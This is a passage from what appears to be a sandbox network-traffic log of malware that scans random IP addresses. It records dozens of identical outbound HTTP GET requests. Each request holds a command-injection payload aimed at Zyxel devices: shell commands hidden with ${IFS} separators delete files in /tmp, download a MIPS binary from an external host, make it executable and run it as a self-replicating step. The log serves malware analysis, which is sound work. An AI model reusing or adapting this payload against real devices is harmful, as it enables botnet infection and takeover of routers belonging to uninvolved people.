                                                Jan 29, 2024 07:08:00.589993000 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7462192.168.2.2337904168.38.198.203443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:00.590015888 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7463192.168.2.234237236.143.187.182443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:00.590059996 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7464192.168.2.234557699.190.138.103443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:00.590109110 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7465192.168.2.2354722211.73.108.15443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:00.590156078 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7466192.168.2.233600812.131.134.71443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:00.590178013 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7467192.168.2.2349654157.135.116.116443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:00.590230942 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7468192.168.2.234449672.102.68.76443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:00.590282917 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7469192.168.2.2341644197.56.241.114443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:00.590363979 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7470192.168.2.235492286.67.65.195443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:00.590369940 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7471192.168.2.235237494.136.19.143443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:00.590430975 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7472192.168.2.2340150153.103.62.209443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:00.590473890 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7473192.168.2.2341464182.129.63.186443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:00.590523005 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7474192.168.2.235202619.204.255.114443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:00.590574026 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7475192.168.2.2354810213.92.230.17443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:00.590578079 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7476192.168.2.2341812169.2.89.14443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:00.590607882 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7477192.168.2.235252040.183.35.95443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:00.590667963 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7478192.168.2.2343902103.131.167.61443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:00.590698957 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7479192.168.2.2333150183.121.211.72443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:00.590730906 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7480192.168.2.233796891.191.217.69443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:00.590799093 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7481192.168.2.23482709.59.95.146443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:00.590801001 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7482192.168.2.2352938135.49.108.61443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:00.590856075 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7483192.168.2.233780073.134.251.121443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:00.590915918 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7484192.168.2.2356162194.242.61.117443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:00.590945005 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7485192.168.2.233474672.56.128.69443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:00.590986967 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7486192.168.2.2337834101.235.221.136443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:00.591018915 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7487192.168.2.233504666.198.181.30443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:00.591072083 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7488192.168.2.235131267.33.102.192443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:00.591093063 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7489192.168.2.2346794166.91.74.229443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:00.591140985 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7490192.168.2.233743690.46.105.62443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:00.591209888 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7491192.168.2.234538466.40.236.45443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:00.591233969 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7492192.168.2.2352386186.151.251.172443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:00.591257095 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7493192.168.2.2352590212.203.205.128443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:00.591304064 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7494192.168.2.2357586171.208.185.73443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:00.591356993 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7495192.168.2.235694666.209.45.126443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:00.591389894 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7496192.168.2.2357254205.123.163.159443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:00.591439962 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7497192.168.2.234200860.129.141.75443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:00.591492891 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7498192.168.2.23575902.190.16.185443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:00.591547966 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7499192.168.2.234624234.34.188.217443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:00.591577053 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7500192.168.2.2353044109.53.174.35443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:00.591620922 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7501192.168.2.2344314206.198.111.124443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:00.591639042 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7502192.168.2.2347246118.183.183.100443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:00.591680050 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7503192.168.2.235331861.195.103.100443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:00.591742992 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7504192.168.2.23327829.224.233.235443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:00.591747046 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7505192.168.2.235813465.245.31.141443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:00.591797113 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7506192.168.2.2339650145.124.48.125443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:00.591837883 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7507192.168.2.233836020.29.41.213443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:00.591867924 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7508192.168.2.233299249.192.199.51443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:00.591919899 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7509192.168.2.2360088120.188.60.2443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:00.591974974 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7510192.168.2.234568636.31.234.119443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:00.592034101 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7511192.168.2.2346306149.29.0.152443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:00.592058897 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7512192.168.2.2344556165.36.253.200443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:00.592093945 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7513192.168.2.23479281.168.16.130443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:00.592149973 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7514192.168.2.235827269.25.30.68443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:00.592171907 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7515192.168.2.2335828190.51.251.146443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:00.592216015 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7516192.168.2.2340186172.135.113.63443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:00.592292070 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7517192.168.2.23448321.61.52.35443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:00.592310905 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7518192.168.2.236093814.88.125.154443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:00.592370987 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7519192.168.2.2356168178.44.159.147443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:00.592390060 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7520192.168.2.234803899.216.57.130443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:00.592434883 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7521192.168.2.233419278.63.112.44443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:00.592468023 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7522192.168.2.2336842148.203.27.203443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:00.592526913 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7523192.168.2.2356204195.151.25.220443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:00.592592001 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7524192.168.2.235591618.42.105.116443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:00.592624903 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7525192.168.2.2353046115.160.242.47443
                                                TimestampBytes transferredDirectionData
